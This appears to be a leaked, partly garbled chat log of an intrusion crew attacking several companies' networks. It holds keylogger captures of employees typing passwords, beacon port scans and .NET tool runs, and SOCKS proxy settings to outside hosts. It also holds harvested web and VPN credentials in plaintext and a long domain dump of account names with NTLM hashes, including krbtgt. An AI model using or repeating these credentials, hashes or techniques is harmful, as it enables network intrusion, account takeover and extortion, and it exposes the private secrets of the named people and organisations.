waterway.com
WIN SERVER: by AD: 16  Alive: 11 (including those without 445)  Attracted: 7
no 445: PDITESTSQL.waterway.com reporting.waterway.com WWSQL2Old.waterway.com wwsql02.waterway.com
Destination host unreachable (I pinged from different hosts, this is the case everywhere): PDIProdWeb2016.waterway.com WW2K1Old.waterway.com WWSQLOLD.waterway.com WATERWAYDSC02.waterway.com
ARMS: AD: 294  Alive: 200
```
When `brandon` is login. pass from nimble. what else on keylog? keylog fucks up some of the characters. `setg Proxies socks4:172.93.105.2:48307` No, I doubt it. I'll try it now, but why are you using it to throw socks? Yeah, did you try the one above? and all passwords that were this one? no, it does not work. check all combinations with his account by username. aha, here are usernames + with a dog in nimble him on the screen at least so. blauer, bradon, you have tried under what? administrator, what else is in question. neither this pass did not work? none of them fit?
Why not change all passwords. give me the full log, then nimbles can be turned on to block our access, they see where the letter came from. until they wake up at the time to block your backup system to enter? i have locked it down, promises not to lock it, so he says it's a bad letter, i don't know what kind of letter it is. the other one asks what it is, a ticket or a voicemail. the first responds, so it throws our message. does not seem it forwarded from the incident with the password to the same RE. see this file, our message that we sent a file? fix where was the passkey, does not fit, this passkey should be
check it) Any pass? this must be the new email password. mapusatera mharper. whose keylog?
Slash starta hai bezi with mailoni also pick up. Task is just catching. 100%. will they be changing the shumihalovym) well hz, they wrote that they serviced a couple of months ago and probably changed the... I think you locked the admin account then... wait lol) no, he tried to log in as admin\administrator. caught the access? blauer. who's sitting here? well this reverse timer says he didn't send it, so i'll try to authorize under this pass. nimble with nimble with nimble with dc, not that he logged in? monitor the `bluetooth`. and specifically she's got the keylogger up crookedly, she's logging in chicly, everything's under control. @user7 I think I've got the harper. Mark and Brandon. ))))) on runettes. "I looked at my last pass and the last thing I had for this is administrator and the administrator password for this connection. I think a couple months back that Mark and Brandon were doing some maintenance and they might have had to reset this not sure though. They might know it. I mean I would hope so at this point...." so they don't know the password themselves) says "fuck me" in the last one. Yeah, noticed before it was fine and stood up crooked. kstat says the connection is wrong. What the fuck is not keylogging? and I do not understand the fun) go to the screenshots, it does? only this caught. Did it come in or not? Wait)) and wait for the pass from there)) if not tomorrow morning, then wait for the moment. there are messages in the mail? judging by the keylogger not much, they are going there. then close the network. if the pass nimble pops up then do `setg Proxies socks4:209.222.97.8:6731`. Give the socks. workers no alerts or not?
```
[-] screenshot from desktop 2 is empty
CurrentUser : WATERWAY\mapusatera
Idletime : 00h:04m:33s:063ms (1326343 milliseconds)
```
empty - nothing in the keylog. did any of the mail have a nimble login alert? Nothing else?
I t[backspace]dont'[backspace][backspace]think this should cause any issues as the [backspace][backspace][backspace]i don't thin[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][a[backspace][backspace][backspace][backspace][backspace] since any of the accounts have been used recently. if you notice any issues, please let me know. ``Not on the phone by any chance? there's someone in the mail complaining about a phish letter from bobane to mail@tl1 but who sent the letter ? Inbox - djarden@waterway.com - Outlook ======= [delete][down][down][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][down][up][up][down][delete][delete][delete][delete][delete][delete][delete][down][down][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][down][down][down][delete][delete][delete][delete][delete][down][down][delete][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][down][delete][down][delete][delete][delete][delete][delete][delete][delete][down][delete][delete][delete][delete][delete][delete][delete][delete][delete] `````` Inbox - djarden@waterway.com - Outlook ======= [delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][delete][ctrl]c ``Basically, this is what it's all about''. Windows Security ======= Myoldpassword6* MyNew[backspace][backspace][backspace][backspace]Myoldpassword6* ``+djarden does it have keylogs? 
[-] screenshot from desktop 2 is empty ``And now there's 16-17 hours in the keylog, it looks like it's been on 24 hours`` CurrentUser : WATERWAY\mharper Idletime : 00h:43m:30s:657ms (2610657 milliseconds) `````` waterway.com WIN SERVER: by AD: 16 Alive: 11 (including those without 445) Attracted: 7 no 445: PDITESTSQL.waterway.com reporting.waterway.com WWSQL2Old.waterway.com wwsql02.waterway.com Destination host unreachable (I pinged from different hosts, this is the case everywhere): PDIProdWeb2016.waterway.com WW2K1Old.waterway.com WWSQLOLD.waterway.com WATERWAYDSC02.waterway.com ARMS: AD: 294 alive: 200 Didn't ask he cleared his desktop? Slack? Just a bunch of errors, no noise on the mail? but keep monitoring nimble nimble nimble192.168.43.8 192.168.43.8 - Google Chrome ======= Admin1Vanilla2 Admin[tab]Admin [alt][alt] Waterway Gas and Wash - Google Chrome ======= MyNewPassworx6[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace][backspace] [backspace][backspace]]djarden@waterwary.com [backspace][tab][right][backspace]Djarden6* Waterway IT - Google Chrome ======= djarden@waterway.com[tab]MyNewPas[backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace]Djarden6* ``and take screenshots see what kind of movement see the keylogging then monitor the mail for noiseotnoo, the keylogs are hanging, nimbles and mail is opentoo everything is ready?either at night or close at once from noise-mail monitor on the situation nimbles are open as soon as we catch immediately enter through soks with the same machine within an hour after 18 wait for the passkeylog hangs on itishnicksharms to ping, yes pre.bat runtut are we all ready? to the live ones I attributed those without ports` `` waterway.com WIN SERVER: by AD: 16 Alive: ~11 Attracted: 7 1. 
here newpcforsomeone arm pulls instead of PDITESTSQL ping PDITESTSQL.waterway.com Pinging PDITESTSQL.waterway.com [192.168.0.127] ping -a 192.168.0.127 Pinging newpcforsomeone.waterway.com [192.168.0.127] beacon> portscan PDITESTSQL.waterway.com [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on PDITESTSQL.waterway.com [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete 2. PDITESTWEB.waterway.com Ping request could not find host PDITESTWEB.waterway.com. Please check the name and try again. 3. beacon> portscan reporting.waterway.com [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on reporting.waterway.com [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete 4. beacon> portscan WWSQL2Old.waterway.com [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on WWSQL2Old.waterway.com [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete 5. beacon> portscan wwsql02.waterway.com [*] Tasked beacon to scan ports 1-1024,3389,5900-6000 on wwsql02.waterway.com [+] host called home, sent: 93285 bytes [+] received output: Scanner module is complete 6. Destination host unreachable: PDIProdWeb2016.waterway.com WW2K1Old.waterway.com WWSQLOLD.waterway.com WATERWAYDSC02.waterway.com Pinged from different hosts, everywhere like this I'll try to pick up a log and send them a ticket to ITSport, maybe something will show up there. Recovery Creative ``` the disks are on NAS, Danas has access ``` http://172.17.70.232:5000/ qlyons applecherrypenguinski `````` hqnas2.evo.local photo-nas.evo.local ``Is it there now? 
The windef is on-try the dll should already have been waiting for action after the lock)`` Maybe no it's not there yet or prophylaxis or they didn't throw it out, it's probably the session died of something us unlikely to have figured out, we wrote above that YES passwords have not changed, just apparently what they had a lag with the authorization oflovid, under the Vpn, but the domain is available[ ](https://mediaeveryone.com/group/evo-com?msg=Dzf6p5uafhY8G45MT) on it like our granddick under the Vpn? just spunnom upload the load available HAL.evo.local HQVEEAMPROXY2.evo.local veeamtemp.evo.local ``in the center ``` hq-vcenter-2.evo.local tcooley@evo.local SammySeveDog44 ``Reviewed the bludhound today, you can see that the parallels YES, the closest - changed in SeptemberIt turns out we were not redeemed)in general the creeds have not changed, tried today they are valid. For what reason so is not clear.`https://remote.itc-us.com/rdweb/pages/en-us/password.aspx` on the desktops of the admins saw a change of password, I wonder where it will lead to the creeds ``. beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe Nathan ITC\br_admin CAKE@horse369!@@ [*] Tasked beacon to run .NET program: SharpSniper.exe NathanK ITC\br_admin CAKE@horse369!@@ [+] host called home, sent: 113781 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. ``This is with the token. beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe NathanK [*] Tasked beacon to run .NET program: SharpSniper.exe NathanK [+] host called home, sent: 113721 bytes [+] received output: [-] Invoke_3 on EntryPoint failed. ````NathanK - what computers was he on ? URL : http://itcma-mits01/mitsdiscover/doLogin.md Username : jasonh Password : Fall@ITC2020! `````` URL : http://itcma-mits01/mitsdiscover/doLogin.md Username : brandent Password : HGp752308! 
--- Chromium Credential (User: brandent) --- URL : https://login.verizonwireless.com/vzauth/UI/Login Username : 5746121367 Password : HGp752301! `````` --- IE/Edge Credential --- Vault Type : Web Credentials Resource : http://itcma-mits01/ Identity : garya Credential : LastModified : 5/7/2020 4:03:55 PM --- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://remote.itc-us.com/ Identity : garya@itc-us.com Credential : Wizz3r600 LastModified : 5/4/2020 12:58:26 PM `````` OU=Security Groups ITCMA-RDS01.ITC.LOCAL 10.0.0.8 ITCMA-RDS-SVR01.ITC.LOCAL 10.0.0.6 ``:thinking:`` [DC] 'ITC.LOCAL' `````` [DC] 'ITC.LOCAL' will be the domain [DC] 'ITCMA-FILE03.ITC.LOCAL' will be the DC server [DC] Exporting domain 'ITC.LOCAL' 1307 infor-test e3a0168bc21cfb88b95c954a5b18f57c 66050 1230 SPInstall ad145b1324989a3f7e1b045626778aea 66050 1232 SPServices 1b3e048d0a40d7c1fac55d6a99297b4b 66050 1304 DHCPDNS dd3f1f083348928ac57db76899e77152 66050 5124 MSOL_ff1eb51ea3ce 98128e43603e7dfdeb1ca559bf8b8256 66080 1642 MainConferenceRoom fe2e8e6e99ac9b05632c831324f708dc 66050 1643 OperationsConference fe2e8e6e99ac9b05632c831324f708dc 66050 5677 AZUREADSSOACC$ 89f488f470b5d44e9b31a762dee94eee 69632 8117 itcmarketing 6aa8a83f5b896d92af48eec925d8714a 512 2146 itccommunications 2ec7b543428ce4cdbde99026428942ed 66048 8191 PCSetup e3f462c08d32e3ba49ed3037037dada0 512 5347 paulaw b1f07bd1d38e076c00b9012f8f20a1a9 514 5297 RyanQ 8850823d1b5bf81b31242f4acd852eed 514 8143 simonw b1f07bd1d38e076c00b9012f8f20a1a9 514 8194 bornz 8574e1d48547de1139bc34ee4afb799b 514 5690 DESKTOP-RCV5PNA$ 5e0ac7ff6f0987a30efeaa03816a9f17 4096 39604 DESKTOP-AE0UUHL$ 7d8b22ab27a2841c7f2994a3eab6616e 4096 40104 ITCMA-WS1025$ 0ca84975a9eeb28c7bcddbf207c520fc 4096 5679 funtech cbe0e0e7bec3a940fa2f18b2b19bb27d 66048 1718 elkconference 69d5ef661299dd1aafa3ff55e0c430c7 66050 5332 ElkProd2 1417dde3ca1f67084b85fcbd6bcc1f97 512 8204 Test_Primary eb6538aa406cfad09403d3bb1f94785f 66048 40105 DESKTOP-07M1VFM$ 
6caaa5a92aa3c25fe10a60af41b871e5 4096 9110 eglchina 08b0ec954a94d3c7f1824957bf3fde72 66048 6604 ITCMA-ESXI03$ ec4af0abf49ecbcc062d5d2f9b534c3a 4096 40129 phoebel 4eea3619d2e635f527a3eeb5d4810253 514 5219 ITCMA-WS1064$ a5213099145a2f4b4e4ac46a3a315cda 4096 9126 ASITC-WS0040$ 851577386ab6a8ec5a84d6a84f9b1b3 4096 40111 tigera 565b89a26b92e552143b5ab2d1643469 514 9127 ASITC-WS0044$ 6ecaee8af623e5576c5f016cedfa3dcc 4096 40146 ITC-CK-PC$ 0d343cec8d448c0c6c45b2dc0bd037d9 4098 5218 ITCMA-WS1065$ 5a3abb44e287f90fae60f11c832ee53a 4096 40162 marilynp e62830daed8dbea4acd0b99d682946bb 512 5301 AustinZ 565b89a26b92e552143b5ab2d1643469 514 9111 kevincopy 2bc2a0308594f2e7481db79c9904e160 514 40121 masonl 7e5792cca8031c0d2dc2c576be8d02e9 514 8139 AndyG b1f07bd1d38e076c00b9012f8f20a1a9 514 40113 janiel 535baf9cf1c3067f9e952cc093f47cea 514 40109 kellyh 08b0ec954a94d3c7f1824957bf3fde72 66050 40106 KimJong 08b0ec954a94d3c7f1824957bf3fde72 66050 40114 navyw 7e5792cca8031c0d2dc2c576be8d02e9 514 5224 elkquality e62830daed8dbea4acd0b99d682946bb 512 40167 rogerm 950a6742fc3da61d118438d1728d604f 512 5660 ITCMA-WS1097$ d348eed65814c1a1f72606d6f07bfac1 4128 39634 ITCMA-WS1095$ b884941346dedaf6d219ba05a51e1753 4128 40119 ITCMA-LT1025$ 6310bb849025ed7b333dd355d1740220 4128 6609 ITCMA-LT1007$ f1e56d0a051db1659a732e6beac8dea3 4096 40176 elishav cbfbcd678b17a8e90ead8638a26eb79c 512 39610 svandyk ed3ccdc38762122a9271c5208d47a301 66048 9119 ASITC-WS0031$ 2c994ffb54b64ce1034ad7a7b8a1db34 4096 9198 ASITC-WS0034$ 6b76cf6737a0e543376191ac3298fe10 4096 5111 ITCMA-WS1021$ f70868955a189abd9cc466e4c01791ba 4096 40117 evany e62830daed8dbea4acd0b99d682946bb 512 39680 PassPortalTest4 d8043111423e997954d32ef405d8ba4f 66048 39678 PassPortalTest2 75bf1e74747577ac3cc3022b8024b5d8 66048 39679 PassPortalTest3 ef188f6919861aa64419642984d21864 66048 8112 ITCMA-WARROOM$ bf3d3790654619faca38a562bbfc38d5 4128 9124 ASITC-WS0071$ aebe58ae5dad870b4000ae5ee82a76bd 4096 9189 ASITC-WS0032$ 8ddab2c440184c51cfa52715d4f11c63 4096 
39633 amazonfba 38f41f2e718ae51efb693b25fb45ed49 66048 5327 ElkShipping 85a60283d2ff2fbd2d40badac9f8a0fe 512 40157 jessiel 8d0f1edbb9f7ea4bbf078827f1cde656 512 5671 ITCMA-LT1064$ bb74c335daff931f17adf9dd73dd0507 4096 39683 nbktest 18fd0c3e7f5d1485e5e46b86f4923ae3 512 40163 mollieh 70e19f6d815e259d52e69172094dc503 512 39664 rachelt 740f70197f2cf7ce6f4e10ca6de5f8c0 512 5208 infor_edi_old 1941c372c3c802defa0af03fddf10c04 66050 5341 sophiac de43e1dcc48916c8096fd857d9619292 514 39612 richb 58aa5e467abb3c5961b0f82ba20782a8 514 5682 laurenj 92670f877d5c6b94abcbb85de50dd647 514 5662 kristaa 8574e1d48547de1139bc34ee4afb799b 514 8172 KatieD 8574e1d48547de1139bc34ee4afb799b 514 5622 DanW eb450fca0a5bed7a5417b5cc9f7d295e 514 8145 AlainaB ba41503f5187aa6f2fbbd576b23b9dc9 514 9118 ASITC-WS0030$ 6db7e0cdcc84e6880df1dff0e9d80dcf 4096 1328 ITCMA-LT1018$ 147b80e8897d09b07ffdc0a898624336 4096 8147 RebeckaC a64795a7d05999a0c2b429586799325c 512 39651 nancyk a64795a7d05999a0c2b429586799325c 512 40115 chaoq cebf8373c4e81a3109faa4043db329d9 514 40149 jerretts e485bbd13a37e4c01272de95d4b644e 514 40161 carlosl f02f1e684771ad51a908ca043ce09733 512 39677 PassPortalTest 589b85762d8ab451401df29aa7fdc417 66048 39686 itccorporatecalendar 589b85762d8ab451401df29aa7fdc417 512 5294 MarkH 7e8c067a506d3190fca59fd3fc61de61 514 1637 Donnettaw a477358010d4eecc48a114f8b7bdb105 512 39681 kellyb 81bb9e0d650df6876cb9dacb2586b505 512 40182 ITCMA-LT1022$ f83f07b0ef6a2600d91ba1fcbdd3d6a5 4096 2205 ITCMA-WS1024$ a1d33625bce1fb2b27236a67b1bd3325 4096 9212 ASITC-WS0096$ 841ca8f92e93e1bad2c4a11412450e8a 4096 39695 ITCLab2 bf1956f6cdff81985e99edf817ab218c7 512 9129 ASITC-WS0013$ bb1df45881daa0a52109b7694c8d4c0e 4096 40178 ITCMA-WS1028$ cf129aa3bbbc16d90669cd646a453bfe 4128 9190 ASITC-WS0001$ d85302272ad9fccfa85ab06cfac2944a 4096 40174 jerryt 32b8ba6aaecbe2d456f2076012541e74 512 9216 ASITC-WS0097$ 8c8a0524e9cab69c33693891c4be7670 4098 4612 ITCMA-WS1054$ 8ff55e603b1249172edfaf3e5de18a7f 4096 39647 PRODuser 
317e1d6c0c4eaa48b331df1a6310060b 512 5201 ITCMA-LT1030$ 4b9f8a314c36ce60329ebaea441fee84 4096 5236 galenw 70586bc2191f0a0872798bcb30c7fcdf 514 5277 ITCMA-WS1077$ 647829b8512a3810780c2fd4fe66f96f 4096 39698 edwardm 3a37fbb6f2020618ebf9a8bab1f64dde 512 5618 ITCMA-WS1074$ 8b3c8ea7623bba2bb3e041a548e0a792 4096 8158 ITCMA-LT1066$ 9419e85545da2871cb542501b4cf0be2 4096 2210 ITCMA-WS1061$ 7fb0b7230dc444f3ebc6e3c6c418a697 4096 5637 ITCMA-WS1087$ f01ed101778a0235811623ddd954f039 4096 40152 maxwellm 273ca5b7b32220194ff7657572bc2a02 512 2218 ITCMA-WS1073$ a6cf4f5d9f9c6b59c7a972d525449e90 4096 2215 ITCMA-LT1032$ 0600883b7fbe72cd3afe33b2781e50b9 4096 5298 c59efdbb56e56613ecd45db5787b04da 512 5330 itcma-ws1091$ 1933cf26ff46aee9e3898ebac4936237 4096 9142 ASITC-WS0075$ 75233948358758b4dd0282f50108824e 4096 39697 juliew 7d7883ad4dfafde4fd3d3811f8100167 512 40180 ASITC-WS0098$ 3b7e9417b27ac5752872171fe45e37ba 4096 9201 ASITC-WS0093$ 3f142e51193e786dfa669a832ee1e392 4098 2147 ElioCommunications 2ec7b543428ce4cdbde99026428942ed 66048 39694 itclab1 0ea4a865b25888558a0ae8b04c6f1162 512 5678 it-imac$ 5e57fc72f37055885756da33f1e76e29 4096 2113 CoreyB 6578de80fdfdf6e2b607eadfbb189810 544 40175 dasmondr c4dfe7c00de60ce6303229ff20a56b8b 512 40158 theodoren b88ff38608970d449d0ea007b9cefb5d 512 40151 karenh ad1677745d36039bcfc0794be2a6cf94 512 1695 thomasl dff852fcb8a279afdcfa4e005b1bacc8 514 40138 martinh 70586bc2191f0a0872798bcb30c7fcdf 514 40116 tinayu 65d75e5a9d12ad87369cc0cb3b230dab 514 2157 ITCMA-VCEN01$ 5eca2e6d3c301ccabced38191da6e644 4096 1724 Royw acbfc03df96e93cf7294a01a6abbda33 514 8155 IvanY cebf8373c4e81a3109faa4043db329d9 514 39632 timy cebf8373c4e81a3109fa9fa4043db329d9 514 39649 andrewz 535baf9cf1c3067f9e952cc093f47cea 514 9112 ASITC-WS0051$ 5a86180ad668883a48ad7b207fb92905 4096 40150 dennisc b5d62c1224046538a3fc5ee33f26b378 512 40153 michaelc 7909b2d24e607f4f2fd7881160049700 512 40160 jamesp fe50873f72b94169590015cb59630456 512 40159 maryf d8f2665dd17622f840d7127a250338a1 514 
9161 ASITC-WS0069$ 7481e6e9fe8486e1034ab06500260070 4098 5621 ITCMA-WS1078$ 357235dcf1bfaebd7e0d22f2a3e52a93 4096 1129 dickh 1c7866f2a9f7ab1d6601443f65512f69 512 2169 KippU 6fbf03d408766a59be6156df406d27b 514 9188 ASITC-WS0046$ 840beaac0c660294b355fbb97ec7b787 4096 1654 kirto a64795a7d05999a0c2b429586799325c 512 8108 OliviaM 83693bd82d5287fa53329e244f2b5bc0 512 9139 ASITC-WS0021$ 5663ec743caf9f7388488b2ad4b8d945 4096 40155 jaredn b12d1fb1d52ee2de7285261d1401da83 514 9225 ASITC-WS0125$ 285f9f9f26cc7d4fe900b722093c731bbc 4096 8130 ITCMA-NAS02$ aee317af072ee03f7617bc92be21e602 69632 9205 ASITC-WS0016$ a302e93852de55c7ba4c2840670215f0 4096 40165 elizabeths 362c54be8465845c2e2e1ee6ad3f89a7 512 1120 lindak 2bc2a0308594f2e7481db79c9904e160 514 1246 dawns a64795a7d05999a0c2b429586799325c 512 1207 shellyb a64795a7d05999a0c2b429586799325c 512 39702 ___VMware_Conv_SA___ 440e42204080d9d1808de1c706d6c165 66048 1215 ccwong 3eddbeb8fbbb24ad3145b1bb7efeee41 66050 1264 Factory1 36e12e09c91d45fdc66488df3d5b2baa 66050 1322 julianl 8277d4760aba9737afdef8deee04d800 66050 1257 leonc e3a0168bc21cfb88b95c954a5b18f57c 514 1310 Lilyh 175cb278577dab61c02b1b20f68075c2 66050 5143 shmalyr cab165b1381d8f2fb1284181a8d79a2d 514 2202 kennyc 0fe26ffc5107e4b20c5a1a1a90d6368c10 514 1242 SSL_Admin fe0cd4846440dbb281d30949283d32d 66048 5207 support_edi 47a01baef13f7dd7065e9418d962e128 66050 5229 MichelleG 3910589ae3080bf99f0faf5aedf6bcd3 514 5237 LPadgett be8410683e173bc7eb4d4983016d4df5 514 5274 support_pj 525a8ecb2bd7de7b9f21cdb27901acf7 66048 1726 Andrewl 1d842980d5b71e8dc94627f47f17fd3e5 66050 8106 janec ceac614e57e88a8cf43196e05bcb6e70 514 5328 FairyY 568d109272f3aa9a1de5460a26e0b3d4 514 1153 elkwarehouse2 e37bf2e00afb4d3cac811f26f52d9ca7 514 5135 Rickc 7535e15737dc6a6f9dbbdae6164687c1 514 1697 gloriak 1b7f0e3eb4a557a2acbb426852337c42 514 1266 stevenj f199f4354f200b30497f70aa76e86a2c 514 9138 sh_admin 433f858db8d9cad2334051f378c37ddf 512 5245 ITCMATEST e39f2af4d496348f1ed435ca236fc1cc 514 2150 
michaelb a56c8954f922afb90fa3b92e7525fb19 66050 2209 kellib b48f1b5491446d29af4ac03a7425cd1c 514 1117 brianp 1304285dadeee9310ec81148b05bb5dd 514 5137 annetteh 87588e1455da040d8b49953d79921b4a 514 2134 bu_veeam b27c2ff6c11408721a28f0a4f6f16a83 66048 41105 aadsync 0cb6232407ea46c3d3f704cba48c5f56 66048 39660 PassportalSync 978f9dd19c43883714f73acd99500cb0 66080 5241 passwordnotify$ 182e24b2711b192713ef950fc1c0ed7f 4096 6607 egltech f5c2d037fbddf81469809c06802c4acf 66048 8156 SLETest 35a2a46fa8d8b8578d7502ae53c42272 512 2198 ITCMA-LT1029$ e78b195fdad2c2910c952221ce5da765 4096 1684 kenw 337fc9e65995c5c4fbfea451346b1df6 512 5670 ITCMA-LT1063$ 7b87606f1a9f613a0d830ea2ef0c82a3 4096 5343 warehouse3 16687489c6824897f2585c58fb345ad2 66050 40166 josephr f4bd4fda1036ee1fad27d0d9ef61ce1a 512 1614 superlogin 29812263b384df487b49ca82f3b4be48 66048 40144 advpn 08b0ec954a94d3c7f1824957bf3fde72 66048 5112 ITCMA-WS1053$ 4b8169fdf3158798a4fcb70e1efd78025 4096 1130 garyl 9101d0697357be9c6b98b784f9ccf979 512 5283 ITCMA-LT1040$ 11826271c727134f1092458c333df6e9 4096 1640 LynnV dc4468f73da3ad8810c65829e76ff826 512 40172 nicoles 32e238f08016761a5be98cd1ffd40070 512 1116 denniss 6681a0025a1066ee85ffee6a9f53a2fd 66050 40173 andrewr e116c5d8e0df37e1bc56100fdc069014 512 40197 jamies 1c49c9cc354ee8c1cef58c9193be2344 512 5658 tonyk 80eb29c49eebac198658d488970fcd8e 512 9193 ASITC-WS0009$ ee58fb1dcdefc20f1f81868c21522f87 4096 9150 ASITC-WS0063$ b2dd61db2862f89990834fc039e32f95 4096 8201 alicew 74793827f352c557c04a4da6a607adb4 512 2155 hky 81a4511c75e09afaf04bb0e28a7ddce2 512 39675 lorencec 91578f59a0caeaaabb0b5a2370ded6b1 512 8199 ITCMA-LT1028$ 81fb2eb37a0f2e911c7b0313d3ca73ae 4096 40170 adrianar 878691045748baa727bea9882c13eafe 512 9152 ASITC-WS0039$ 9f0043969a59b02b23f7847cebc6a628 4096 40200 hannahc c90c4669684f518d36771155d56f3ea2 512 5665 ITCMA-LT1057$ 2e4fb682d249cf53e7049a299aabce5a 4096 39611 egladmin d64655136d7f93780715bb1a83f7b40b 66048 40164 leonr dc85c733b853158f3dc3346f19fa78f9 512 
1251 UPSAdmin d54feab3ae1cd743c74bd79e9c63aa36 514 5276 ITCMA-WS1076$ 044197422e06f63efe35a9ac8c249290 4096 39676 ssoadmin 3e4ec6517ffcc07a51059ebe8b9a05f4 512 9187 ASITC-WS0055$ 5745fa49aaa4a565eab048edb15910d8 4096 40156 angelaf 768139be80286a507b64b80eba0d4dd5 514 40154 davidh e62830daed8dbea4acd0b99d682946bb 512 40168 daniels d5993216e22e22e06efaf21d076b8c3f8e3 512 2164 jamesm ba4e5946331fc545914ecc9cbc8a3b53 512 39662 paustin 32ba59e63c228fc531b6e14a370d72ba 512 502 krbtgt 81e28a7bf06c3bff02feee793bcab78a 514 1151 warehouse1 67e4c62179d56d0f922105ee5681282c 514 1340 ITCMA-LT1020$ bd9a72e6b1d7e261d75b1cc6e26d4791 4096 40123 ITCMA-LT1075$ b82a59b0c5dc2046905ed60aa6ed25d9 4096 39668 ITCMA-LT1027$ a2dd537e33316e38637bc3e59df222b4 4096 41117 WINDEV2004EVAL$ c0334b629816e40e72731aabfbb0a973 4096 1694 angiel 33a26f76c61382ae500caccbca82803f 514 40135 kristiev 2f3efe73d291da6e7ddc9b54c238c308 514 41116 chrishoyt 25f900466b55ec728305c13027d24022 512 41115 terrin f9ee54b70f789caa6dd292c307a6250e 512 9219 ASITC-WS0113$ ac138f958fd09c5d7c28923be16b4f14 4096 5291 ITCMA-LT1041$ 7a67bdc20dce79ff44ce97d9fdc30c1d 4096 1231 SPFarm cc9bf398b6e637a2e7f708ea458c2105 66050 9226 ASITC-WS0128$ 3db5793500addec855f3787e33922c6d 4096 1313 sslvpn 0530e010fd31ed782ec4fc0d79231c5a 66050 39613 AAD_4e4f0fe8f058 08b0ec954a94d3c7f1824957bf3fde72 66048 41104 AAD_ee11aef66e2f 29311b26b9f3ef13e822d3263e4fa38f 66048 1138 dank 1a487688d1beba344274d40af2b7707a 512 5314 ITCMA-WS1090$ 074587b98978eb67005a7041f2851c38 4096 9223 ASITC-WS0108$ efc5c2fa304ecddacd8f4cf78c331290 4096 41108 testing 3e85d5a1410e277a4e7084c253810157 512 1337 deang 73d9e66b9131e12f52c441e208deaca0 66048 40206 micks ac2ac419036fd91e05aac746c8660a55 512 6608 vmware 3b224b954ae6a5bfca10a1c8688bfbbb 66048 8144 ITCMA-LT1060$ 660048976bb4b1cb09c26d89bbd1de2d 4096 8113 ITCMA-WS1098$ da533071e958348308f4e8ed581ec335e 4096 8168 Misc01 f2d429b35f633b12eefbee498aafbad2 512 2189 ITCMA-LT1026$ 92ff8ee0302d42f44d6f29de25760b45 4096 39629 
ITCMA-LOANER1$ d7615b90d36bb108ead3e08ff636cc9c 4096 5174 SLEAdmin b28bc7ab76873471029a9ad657f75d18 66048 8185 Survey 7c5282ddad27303ae14390a5dde567f9 512 5293 ITCMA-LT1043$ 01363845f89c79d100b3ce008d9ddbe7 4128 8153 JessieC d92029926067bd7fed56b72ffda8e62a 512 5192 ITCMA-WS1027$ 4f4f2bf597a258f7e68d53ed59f2ca4c 4096 1240 PaceJet 06af9d10811d1951f7afd09efbebf6c6 66048 5633 MataC edbeb07a3c05e55b8721ac23f294bcb2 512 5669 ITCMA-LT1062$ bd08015476bc185b984785efbff43bf7 4096 39630 michellew cef2eb521883d390b32b0b5bb916f7bb 512 1127 lorin 7c8566e384468b76fe9c11f5ef635422 512 40120 timothym cef2eb521883d390b32b0b5bb916f7bb 512 39628 ITCMA-LT1073$ 04fba433f154bc3b66b780f110a64bac 4096 5216 ITCMA-WS1062$ e622588e1a0b5bfcac19cb13cc0296b1 4096 1689 rachelp 9a4c3fbbf6e6b1fe805d0ffc7378f0d9 512 9144 ASITC-WS0084$ 4b897158c8ef783510626ee501d67a23 4096 5648 warehouse2 1628488e442316500a176701e0ac3c54 512 40204 ITCMA-CR01$ c683d967ce29df38afbd1eff4f69e9f2 4096 5338 EricG 98884d9fd2e6def74cbb7bb34bdd650f 512 9211 70586bc2191f0a0872798bcb30c7fcdf 66048 9217 ASITC-WS0101$ 6dc65547a71877b96f32eb43fbf8eacb 4096 40133 hudreceiving 1d32ad40cecbc0419f99a08e0845dd66 512 1715 bdf0593666f4484c2860800af6834eb2 512 9199 ASITC-WS0010$ 343a3b47f144eb6784cf1f86893ad207 4096 9121 ASITC-WS0036$ aed48f171fd46be32ae4a4269032653a 4096 2141 linconf 4c3879fef394fa5dce0037c197c70841 512 1698 ITCMA-ENG01$ df61c05ce9fd0f68a79a6006bb7b0f26 4096 1716 flexlight 984cb3817e444c7e325ad0c4a471a74f 512 5683 ITCMA-LT1068$ 7a94bf2ca843c714bb1e69b840fafb80 4096 1665 ELKUPSUser dc4b02eb894f18b53d78197c8ffe024c 512 5308 RichW 8195790b740761023b7e34280db878c5 512 1219 tomh 78dfc14107c931f730bce53b47dee641 512 5627 ITCMA-WS1080$ 708ad4a3223993991427f33b6aea5da4578 4096 1277 trentr 589b85762d8ab451401df29aa7fdc417 512 1122 dickc 602a9783f3aa3422f2697b1115da27f3 512 2188 BradB dba247aa9535f1d877062d139d04a46a 512 8195 ITCMA-LT1070$ 02fd6908bd6d78b6b35b399d3e74517f 4096 5348 itcma-ws1094$ 03ab2b6c8260c6c5a89bb1dae3f2ae9f 
